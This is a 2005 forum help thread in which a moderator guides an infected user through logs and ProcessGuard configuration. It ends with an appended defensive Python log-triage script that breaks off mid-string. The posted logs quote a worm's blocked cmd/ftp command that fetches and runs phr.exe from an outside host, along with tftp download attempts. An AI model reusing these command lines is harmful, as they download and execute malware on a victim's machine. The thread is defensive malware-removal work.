help i have trojan horse collected.5.L [RESOLVED]



#211 duglartis (Member, Topic Starter, 159 posts)
Hi, did search, does not seem to exist any longer. I managed to save this log file on another lock up, hope it is of some help. Thanks for your help.
Process PID CPU Description Company Name
System Idle Process 0
Interrupts n/a Hardware Interrupts
DPCs n/a 0.98 Deferred Procedure Calls
System 4 2.94
SMSS.EXE 360 Windows NT Session Manager Microsoft Corporation
CSRSS.EXE 412 Client Server Runtime Process Microsoft Corporation
WINLOGON.EXE 440 Windows NT Logon Application Microsoft Corporation
SERVICES.EXE 484 Services and Controller app Microsoft Corporation
SVCHOST.EXE 656 93.14 Generic Host Process for Win32 Services Microsoft Corporation
TFTP.EXE 1464 Trivial File Transfer Protocol App Microsoft Corporation
SVCHOST.EXE 680 Generic Host Process for Win32 Services Microsoft Corporation
SVCHOST.EXE 744 Generic Host Process for Win32 Services Microsoft Corporation
SVCHOST.EXE 784 Generic Host Process for Win32 Services Microsoft Corporation
SPOOLSV.EXE 1064 Spooler SubSystem App Microsoft Corporation
ALG.EXE 1180 Application Layer Gateway Service Microsoft Corporation
AVGAMSVR.EXE 1204 AVG Alert Manager GRISOFT, s.r.o.
AVGUPSVC.EXE 1228 AVG Update Service GRISOFT, s.r.o.
DCSUserProt.exe 1284 DiamondCS ProcessGuard Service DiamondCS
NVSVC32.EXE 1340 NVIDIA Driver Helper Service, Version 42.30 NVIDIA Corporation
TCPSVCS.EXE 1444 TCP/IP Services Application Microsoft Corporation
SVCHOST.EXE 1548 Generic Host Process for Win32 Services Microsoft Corporation
LSASS.EXE 496 LSA Shell (Export Version) Microsoft Corporation
EXPLORER.EXE 1012 Windows Explorer Microsoft Corporation
HPZTSB07.EXE 1292 HP
Directcd.exe 1356 DirectCD Application Roxio
AVGCC.EXE 1712 AVG Control Center GRISOFT, s.r.o.
AVGEMC.EXE 1740 AVG E-Mail Scanner GRISOFT, s.r.o.
REGPROT.EXE 1768
pgaccount.exe 1852 pgaccount DiamondCS
procguard.exe 1984 GUI Aspect of ProcessGuard DiamondCS
FIREFOX.EXE 1664 Firefox Mozilla
RUNDLL32.EXE 2020 Run a DLL as an App Microsoft Corporation
procexp.exe 1940 2.94 Sysinternals Process Explorer Sysinternals

Process: SVCHOST.EXE Pid: 656

Name Description Company Name Version
advapi32.dll Advanced Windows 32 Base API Microsoft Corporation 5.01.2600.1106
ctype.nls
dnsapi.dll DNS Client API DLL Microsoft Corporation 5.01.2600.1106
gdi32.dll GDI Client DLL Microsoft Corporation 5.01.2600.1106
iphlpapi.dll IP Helper API Microsoft Corporation 5.01.2600.0002
kernel32.dll Windows NT BASE API Client DLL Microsoft Corporation 5.01.2600.1106
locale.nls
msvcrt.dll Windows NT CRT DLL Microsoft Corporation 7.00.2600.1106
mswsock.dll Microsoft Windows Sockets 2.0 Service Provider Microsoft Corporation 5.01.2600.0000
ntdll.dll NT Layer DLL Microsoft Corporation 5.01.2600.1106
rasadhlp.dll Remote Access AutoDial Helper Microsoft Corporation 5.01.2600.0000
rpcrt4.dll Remote Procedure Call Runtime Microsoft Corporation 5.01.2600.1106
rpcss.dll Distributed COM Services Microsoft Corporation 5.01.2600.1106
secur32.dll Security Support Provider Interface Microsoft Corporation 5.01.2600.1106
sortkey.nls
sorttbls.nls
svchost.exe Generic Host Process for Win32 Services Microsoft Corporation 5.01.2600.0000
unicode.nls
user32.dll Windows XP USER API Client DLL Microsoft Corporation 5.01.2600.1106
userenv.dll Userenv Microsoft Corporation 5.01.2600.1106
winrnr.dll LDAP RnR Provider DLL Microsoft Corporation 5.01.2600.0000
wldap32.dll Win32 LDAP API DLL Microsoft Corporation 5.01.2600.1106
ws2_32.dll Windows Socket 2.0 32-Bit DLL Microsoft Corporation 5.01.2600.0000
ws2help.dll Windows Socket 2.0 Helper for Windows NT Microsoft Corporation 5.01.2600.0000
wshtcpip.dll Windows Sockets Helper DLL Microsoft Corporation 5.01.2600.0000

Edited by duglartis, 29 October 2005 - 01:42 PM.

#212 duglartis (Member, Topic Starter, 159 posts)
Thought I might add this Process Guard log as well, hope it is of some help.
---Process Guard Log Started---
Sat 29 - 16:54:44 [EXECUTION] "c:\program files\quicktime\qttask.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\program files\quicktime\qttask.exe" -atboottime ]
Sat 29 - 16:54:45 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [1400]
[EXECUTION] Commandline - [ c:\windows\system32\dumprep.exe 0 -kg ]
Sat 29 - 16:54:45 [EXECUTION] "c:\windows\system32\tcpsvcs.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [480]
[EXECUTION] Commandline - [ c:\windows\system32\tcpsvcs.exe ]
Sat 29 - 16:54:45 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\nvsvc32.exe" [1388]
[EXECUTION] Commandline - [ rundll32.exe nvcpl.dll,resetview ]
Sat 29 - 16:54:46 [EXECUTION] "c:\program files\grisoft\avg free\avgcc.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avgcc.exe" /startup ]
Sat 29 - 16:54:46 [EXECUTION] "c:\windows\system32\svchost.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [480]
[EXECUTION] Commandline - [ c:\windows\system32\svchost.exe -k imgsvc ]
Sat 29 - 16:54:46 [EXECUTION] "c:\program files\grisoft\avg free\avgemc.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avgemc.exe" ]
Sat 29 - 16:54:47 [EXECUTION] "c:\documents and settings\dug and tania\my documents\downloads\regprot.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\documents and settings\dug and tania\my documents\downloads\regprot.exe" /start ]
Sat 29 - 16:54:48 [EXECUTION] "c:\windows\system32\nwiz.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\windows\system32\nwiz.exe" /install ]
Sat 29 - 16:54:49 [EXECUTION] "c:\program files\processguard\pgaccount.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\program files\processguard\pgaccount.exe" ]
Sat 29 - 16:54:49 [EXECUTION] "c:\windows\system32\imapi.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [480]
[EXECUTION] Commandline - [ c:\windows\system32\imapi.exe ]
Sat 29 - 16:54:49 [EXECUTION] "c:\program files\common files\real\update_ob\realsched.exe" was blocked from running
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\program files\common files\real\update_ob\realsched.exe" -osboot ]
Sat 29 - 16:54:49 [EXECUTION] "c:\windows\system32\s3tray2.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\windows\system32\s3tray2.exe" ]
Sat 29 - 16:54:49 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\windows\system32\rundll32.exe" nview.dll,nviewloadhook ]
Sat 29 - 16:54:49 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [480]
[EXECUTION] Commandline - [ rundll32.exe newdev.dll,clientsideinstall \\.\pipe\pnp_device_install_pipe_0.{3342c1de-5cf6-465d-b26d-5f51416ff027} ]
Sat 29 - 16:54:49 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [316]
[EXECUTION] Commandline - [ rundll32 nview.dll,nviewinitialize ]
Sat 29 - 16:54:50 [EXECUTION] "c:\program files\processguard\procguard.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\program files\processguard\procguard.exe" -minimize ]
Sat 29 - 16:54:50 [EXECUTION] "c:\program files\microsoft office\office\osa9.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\program files\microsoft office\office\osa9.exe" -b -l ]
Sat 29 - 16:56:36 [EXECUTION] "c:\windows\explorer.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\windows\explorer.exe" /n,/e,c:\ ]
Sat 29 - 16:59:09 [EXECUTION] "c:\program files\microsoft office\office\winword.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\program files\microsoft office\office\winword.exe" /n ]
Sat 29 - 17:03:48 [EXECUTION] "c:\windows\explorer.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\windows\explorer.exe" /n,/e,c:\ ]
Sat 29 - 17:08:31 [EXECUTION] "c:\windows\system32\cleanmgr.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\windows\system32\cleanmgr.exe" /d h ]
Sat 29 - 17:08:33 [EXECUTION] "c:\windows\system32\runonce.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\rundll32.exe" [320]
[EXECUTION] Commandline - [ runonce -r ]
Sat 29 - 17:08:35 [EXECUTION] "c:\windows\system32\runonce.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\rundll32.exe" [320]
[EXECUTION] Commandline - [ runonce -r ]
Sat 29 - 17:09:33 [EXECUTION] "c:\windows\system32\imapi.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [480]
[EXECUTION] Commandline - [ c:\windows\system32\imapi.exe ]
Sat 29 - 17:09:41 [EXECUTION] "g:\setup.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ g:\setup.exe ]
Sat 29 - 17:10:18 [EXECUTION] "c:\windows\system32\logonui.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\winlogon.exe" [436]
[EXECUTION] Commandline - [ logonui.exe /status /shutdown ]
Sat 29 - 17:10:29 [TERMINATE] c:\windows\system32\services.exe [480] was blocked from terminating c:\windows\system32\spoolsv.exe [1068]

#213 duglartis (Member, Topic Starter, 159 posts)
One last question: if I set the infected drive up as a slave drive and can access it through Windows Explorer, is there any way to remove the infected Windows operating system without losing the other data on the drive? Thanks for your help, cheers.

#214 Metallica (Spyware Veteran, GeekU Moderator, 31,942 posts)
The objection to your last idea (repairing Windows, aka installing over the top) is that you came back worse the last time you tried.

It may be a good idea, but you will have to take your time especially setting up ProcessGuard again.

In your last Process Explorer log I noticed TFTP.EXE running.
In the one before that there was the file you couldn't find afterwards.
Those are signs that PG is not configured securely enough.

Regards,

#215 duglartis (Member, Topic Starter, 159 posts)
Ok, thanks for the advice, I am not going to attempt my suggestion. Where to from here so we can get PG configured correctly? Incidentally, the TFT.exe is the application that uses up all the processor free memory; I have been trying to capture a log file of it.
Thanks for your help
Cheers

#216 Metallica (Spyware Veteran, GeekU Moderator, 31,942 posts)
Well, the first step is to limit the permissions to the bare necessities.

On the Security tab go over the list of Filenames one by one.

Remove the ones that should not be there.
By right-clicking and looking at Properties you can find information when in doubt.
If that doesn't tell you enough, feel free to ask here.

Let me know when you are done with this part.

Regards,

#217 duglartis (Member, Topic Starter, 159 posts)
Hello again, excuse my ignorance. I know which applications I have installed, but I am not sure which Windows processes are the right ones to allow.
Thanks for your help
Cheers

#218 Metallica (Spyware Veteran, GeekU Moderator, 31,942 posts)
The ones you definitely do not want to mess with are:

svchost.exe
services.exe
winlogon.exe
smss.exe
csrss.exe
lsass.exe
explorer.exe
logonui.exe
rundll32.exe
Those should also be listed on the Protection tab.

Usually present and OK are:
iexplore.exe
cisvc.exe
spoolsv.exe
dllhost.exe
mdm.exe
notepad.exe
taskmgr.exe
regedit.exe

Let me know if that leaves any question marks.

Regards,

#219 duglartis (Member, Topic Starter, 159 posts)
Hello, I have denied access to all but the ones on the list and the ones I know are programme related. Some of the ones you listed did not show in the Security tab, don't know if this is normal or not. I am away from the computer now until the 8th of November, will check back then. Thanks for your help and I look forward to hearing where to next.
Cheers

#220 Metallica (Spyware Veteran, GeekU Moderator, 31,942 posts)
Once you get back I'd like to see a HijackThis log and a PG log that was recorded during the time you made the HijackThis log.

Regards,

#221 duglartis (Member, Topic Starter, 159 posts)
I am back. First is the HijackThis log file, then the PG log file. Thanks for your help.
Logfile of HijackThis v1.99.1
Scan saved at 7:43:11 p.m., on 9/11/2005
Platform: Windows XP SP1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\spoolsv.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgamsvr.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgupsvc.exe
C:\Program Files\ProcessGuard\dcsuserprot.exe
C:\WINDOWS\System32\nvsvc32.exe
C:\WINDOWS\System32\spool\drivers\w32x86\3\hpztsb07.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Roxio\Easy CD Creator 5\DirectCD\DirectCD.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgcc.exe
C:\PROGRA~1\Grisoft\AVGFRE~1\avgemc.exe
C:\documents and settings\dug and tania\my documents\downloads\regprot.exe
C:\Program Files\ProcessGuard\pgaccount.exe
C:\Program Files\ProcessGuard\procguard.exe
C:\WINDOWS\System32\rundll32.exe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Documents and Settings\Dug And Tania\My Documents\hijack\HijackThis.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://netaccess.co.nz/
O2 - BHO: AcroIEHlprObj Class - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 6.0\Reader\ActiveX\AcroIEHelper.dll
O2 - BHO: (no name) - {53707962-6F74-2D53-2644-206D7942484F} - C:\PROGRA~1\SPYBOT~1\SDHelper.dll
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O4 - HKLM\..\Run: [HPDJ Taskbar Utility] C:\WINDOWS\System32\spool\drivers\w32x86\3\hpztsb07.exe
O4 - HKLM\..\Run: [AdaptecDirectCD] C:\Program Files\Roxio\Easy CD Creator 5\DirectCD\DirectCD.exe
O4 - HKLM\..\Run: [NeroCheck] C:\WINDOWS\System32\\NeroCheck.exe
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINDOWS\System32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [KernelFaultCheck] %systemroot%\system32\dumprep 0 -k
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [AVG7_CC] C:\PROGRA~1\Grisoft\AVGFRE~1\avgcc.exe /STARTUP
O4 - HKLM\..\Run: [AVG7_EMC] C:\PROGRA~1\Grisoft\AVGFRE~1\avgemc.exe
O4 - HKLM\..\Run: [RegProt] c:\documents and settings\dug and tania\my documents\downloads\regprot.exe /start
O4 - HKLM\..\Run: [nwiz] nwiz.exe /install
O4 - HKLM\..\Run: [!1_pgaccount] "C:\Program Files\ProcessGuard\pgaccount.exe"
O4 - HKLM\..\Run: [TkBellExe] "C:\Program Files\Common Files\Real\Update_OB\realsched.exe" -osboot
O4 - HKLM\..\Run: [S3TRAY2] S3tray2.exe
O4 - HKCU\..\Run: [NVIEW] rundll32.exe nview.dll,nViewLoadHook
O4 - HKCU\..\Run: [!1_ProcessGuard_Startup] "C:\Program Files\ProcessGuard\procguard.exe" -minimize
O4 - HKCU\..\Run: [Yahoo! Pager] D:\PROGRA~1\YAHOO!\MESSEN~1\ypager.exe -quiet
O4 - Global Startup: Microsoft Office.lnk = C:\Program Files\Microsoft Office\Office\OSA9.EXE
O8 - Extra context menu item: Linked ima&ges - C:\Program Files\IEimage\IEimage.htm
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\WINDOWS\SYSTEM32\MSJAVA.DLL
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\WINDOWS\SYSTEM32\MSJAVA.DLL
O9 - Extra button: Related - {c95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\WINDOWS\web\related.htm
O9 - Extra 'Tools' menuitem: Show &Related Links - {c95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\WINDOWS\web\related.htm
O15 - Trusted Zone: http://www.giftedonl...edusearch.co.nz
O15 - Trusted Zone: http://ny.contentmatch.net (HKLM)
O16 - DPF: {11260943-421B-11D0-8EAC-0000C07D88CF} (iPIX ActiveX Control) - http://www.ipix.com/download/ipixx.cab
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://v5.windowsupd...b?1098860877234
O16 - DPF: {9A9307A0-7DA4-4DAF-B042-5009F29E09E1} (ActiveScan Installer Class) - http://www.pandasoft.../as5/asinst.cab
O17 - HKLM\System\CCS\Services\Tcpip\..\{62AC063D-A459-4836-B78F-3EDA6D280C19}: NameServer = 202.37.101.1 202.37.101.2
O23 - Service: AVG7 Alert Manager Server (Avg7Alrt) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVGFRE~1\avgamsvr.exe
O23 - Service: AVG7 Update Service (Avg7UpdSvc) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVGFRE~1\avgupsvc.exe
O23 - Service: DiamondCS Process Guard Service v3.000 (DCSPGSRV) - DiamondCS - C:\Program Files\ProcessGuard\dcsuserprot.exe
O23 - Service: NVIDIA Driver Helper Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\System32\nvsvc32.exe

--Process Guard Log Started---
Wed 09 - 19:07:10 [EXECUTION] "c:\windows\system32\tcpsvcs.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\services.exe" [480]
[EXECUTION] Commandline - [ c:\windows\system32\tcpsvcs.exe ]
Wed 09 - 19:07:11 [EXECUTION] "c:\windows\system32\svchost.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [480]
[EXECUTION] Commandline - [ c:\windows\system32\svchost.exe -k imgsvc ]
Wed 09 - 19:07:11 [EXECUTION] "c:\program files\roxio\easy cd creator 5\directcd\directcd.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\program files\roxio\easy cd creator 5\directcd\directcd.exe" ]
Wed 09 - 19:07:11 [EXECUTION] "c:\windows\system32\nerocheck.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\windows\system32\nerocheck.exe" ]
Wed 09 - 19:07:12 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\windows\system32\rundll32.exe" c:\windows\system32\nvcpl.dll,nvstartup ]
Wed 09 - 19:07:13 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\nvsvc32.exe" [1336]
[EXECUTION] Commandline - [ rundll32.exe nvcpl.dll,resetview ]
Wed 09 - 19:07:14 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\windows\system32\dumprep.exe" 0 -k ]
Wed 09 - 19:07:14 [EXECUTION] "c:\program files\quicktime\qttask.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\program files\quicktime\qttask.exe" -atboottime ]
Wed 09 - 19:07:14 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [1628]
[EXECUTION] Commandline - [ c:\windows\system32\dumprep.exe 0 -kg ]
Wed 09 - 19:07:14 [EXECUTION] "c:\program files\grisoft\avg free\avgcc.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avgcc.exe" /startup ]
Wed 09 - 19:07:15 [EXECUTION] "c:\program files\grisoft\avg free\avgemc.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avgemc.exe" ]
Wed 09 - 19:07:15 [EXECUTION] "c:\documents and settings\dug and tania\my documents\downloads\regprot.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\documents and settings\dug and tania\my documents\downloads\regprot.exe" /start ]
Wed 09 - 19:07:15 [EXECUTION] "c:\windows\system32\nwiz.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\windows\system32\nwiz.exe" /install ]
Wed 09 - 19:07:16 [EXECUTION] "c:\program files\processguard\pgaccount.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\program files\processguard\pgaccount.exe" ]
Wed 09 - 19:07:16 [EXECUTION] "c:\program files\common files\real\update_ob\realsched.exe" was blocked from running
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\program files\common files\real\update_ob\realsched.exe" -osboot ]
Wed 09 - 19:07:16 [EXECUTION] "c:\windows\system32\s3tray2.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\windows\system32\s3tray2.exe" ]
Wed 09 - 19:07:16 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\windows\system32\rundll32.exe" nview.dll,nviewloadhook ]
Wed 09 - 19:07:17 [EXECUTION] "c:\program files\processguard\procguard.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\program files\processguard\procguard.exe" -minimize ]
Wed 09 - 19:07:17 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [1872]
[EXECUTION] Commandline - [ rundll32 nview.dll,nviewinitialize ]
Wed 09 - 19:07:19 [EXECUTION] "c:\program files\microsoft office\office\osa9.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\program files\microsoft office\office\osa9.exe" -b -l ]
Wed 09 - 19:07:22 [EXECUTION] "c:\windows\system32\imapi.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\services.exe" [480]
[EXECUTION] Commandline - [ c:\windows\system32\imapi.exe ]
Wed 09 - 19:08:00 [EXECUTION] "c:\program files\grisoft\avg free\avginet.exe" was allowed to run
[EXECUTION] Started by "c:\progra~1\grisoft\avgfre~1\avgcc.exe" [1740]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avginet.exe" ]
Wed 09 - 19:08:04 [EXECUTION] "c:\program files\mozilla firefox\firefox.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\program files\mozilla firefox\firefox.exe" ]
Wed 09 - 19:19:25 [EXECUTION] "c:\program files\grisoft\avg free\avginet.exe" was allowed to run
[EXECUTION] Started by "c:\progra~1\grisoft\avgfre~1\avgcc.exe" [1740]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avginet.exe" ]
Wed 09 - 19:21:30 [EXECUTION] "c:\windows\system32\cmd.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\lsass.exe" [492]
[EXECUTION] Commandline - [ cmd /c echo open phr3akftp.darksensui.info 612 >appmr.dll &echo user phr klopklop >>appmr.dll &echo binary >>appmr.dll &echo get >>appmr.dll &echo phr.exe >>appmr.dll &echo phr.exe >>appmr.dll &echo bye >>appmr.dll &ftp.exe -n -s:appmr.dll &del appmr.dll &phr.exe ]
Wed 09 - 19:22:03 [EXECUTION] "c:\program files\grisoft\avg free\avginet.exe" was allowed to run
[EXECUTION] Started by "c:\progra~1\grisoft\avgfre~1\avgcc.exe" [1740]
[EXECUTION] Commandline - [ c:\progra~1\grisoft\avgfre~1\avginet.exe /settings 131298 ]
Wed 09 - 19:22:48 [EXECUTION] "c:\program files\internet explorer\iexplore.exe" was allowed to run
[EXECUTION] Started by "c:\progra~1\grisoft\avgfre~1\avgcc.exe" [1740]
[EXECUTION] Commandline - [ "c:\program files\internet explorer\iexplore.exe" -nohome ]
Wed 09 - 19:42:40 [EXECUTION] "c:\windows\explorer.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\windows\explorer.exe" /n,/e,c:\ ]
Wed 09 - 19:42:59 [EXECUTION] "c:\documents and settings\dug and tania\my documents\hijack\hijackthis.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ "c:\documents and settings\dug and tania\my documents\hijack\hijackthis.exe" ]
Wed 09 - 19:43:11 [EXECUTION] "c:\windows\system32\notepad.exe" was allowed to run
[EXECUTION] Started by "c:\documents and settings\dug and tania\my documents\hijack\hijackthis.exe" [968]
[EXECUTION] Commandline - [ c:\windows\system32\notepad.exe c:\documents and settings\dug and tania\my documents\hijack\hijackthis.log ]
Wed 09 - 19:44:00 [EXECUTION] "c:\windows\system32\notepad.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1016]
[EXECUTION] Commandline - [ c:\windows\system32\notepad.exe c:\program files\processguard\logs\pglog_11_2005.txt ]

#222 Metallica (Spyware Veteran, GeekU Moderator, 31,942 posts)
Hi Doug,

Can you please use Agent Ransack to look for any files containing:
darksensui

Don't do anything yet, just let me know the results.

Regards,

#223 duglartis (Member, Topic Starter, 159 posts)
Hi there, downloaded and ran, nothing found.
I guess this isn't good. I had a couple of interesting things happen last night; I have included the PG logs.

Wed 09 - 20:09:08 [EXECUTION] "c:\windows\system32\tftp.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [652]
[EXECUTION] Commandline - [ tftp.exe -i 0.0.0.0 get msupdate32.exe ]
Wed 09 - 20:12:15 [EXECUTION] "c:\windows\system32\gbzhy.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [652]
[EXECUTION] Commandline - [ "gbzhy.exe" ]
Wed 09 - 21:02:07 [EXECUTION] "c:\windows\system32\tftp.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [652]
[EXECUTION] Commandline - [ tftp.exe -i 0.0.0.0 get msupdate32.exe
Thu 10 - 19:22:43 [EXECUTION] "c:\windows\system32\dwwin.exe" was blocked from running
[EXECUTION] Started by "Unknown Process" [916]
[EXECUTION] Commandline - [ c:\windows\system32\dwwin.exe -d c:\docume~1\dugand~1\locals~1\temp\wera.tmp.dir00\manifest.txt ]
Hope this is of some help.
Thanks for your help
Cheers

Edited by duglartis, 10 November 2005 - 12:33 AM.

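A defender-side triage of the ProcessGuard log format posted in this thread, written as an added example (not code from the thread, from ProcessGuard or from its vendor). It groups the three-line [EXECUTION] records into events, applies the allowlist from post #218, and flags the patterns that mattered on this machine: a transfer tool or shell launched by svchost.exe or lsass.exe, an unlisted system32 executable started by a service, and a parent that could not be identified. The SERVICE_LEVEL split and the sample log (with a placeholder FTP host) are my own constructions.

```python
import re
from dataclasses import dataclass
from typing import List, Tuple

# Allowlists from post #218 in this thread: core processes that must never be denied
# (and belong on PG's Protection tab) and the "usually present and OK" set.
CORE_PROCESSES = {"svchost.exe", "services.exe", "winlogon.exe", "smss.exe", "csrss.exe",
                  "lsass.exe", "explorer.exe", "logonui.exe", "rundll32.exe"}
USUALLY_OK = {"iexplore.exe", "cisvc.exe", "spoolsv.exe", "dllhost.exe", "mdm.exe",
              "notepad.exe", "taskmgr.exe", "regedit.exe"}
# My own split (an assumption, not from the thread): service-level processes that have
# no business launching a shell or a file-transfer tool on a desktop.
SERVICE_LEVEL = CORE_PROCESSES - {"explorer.exe", "rundll32.exe", "logonui.exe"}
TRANSFER_TOOLS = {"tftp.exe", "ftp.exe", "cmd.exe"}

EXEC_RE = re.compile(r'^(?P<ts>\w{3} \d{2} - \d{2}:\d{2}:\d{2}) \[EXECUTION\] '
                     r'"(?P<image>[^"]+)" was (?P<verdict>allowed to run|blocked from running)$')
PARENT_RE = re.compile(r'^\[EXECUTION\] Started by "(?P<parent>[^"]+)" \[(?P<pid>\d+)\]$')
# The closing " ]" is optional: one line of the posted log was cut off before it.
CMD_RE = re.compile(r'^\[EXECUTION\] Commandline - \[ (?P<cmd>.*?)\s*\]?$')

# Constructed sample in the thread's log format (ftp.example.invalid is a placeholder host).
SAMPLE_LOG = r"""---Process Guard Log Started---
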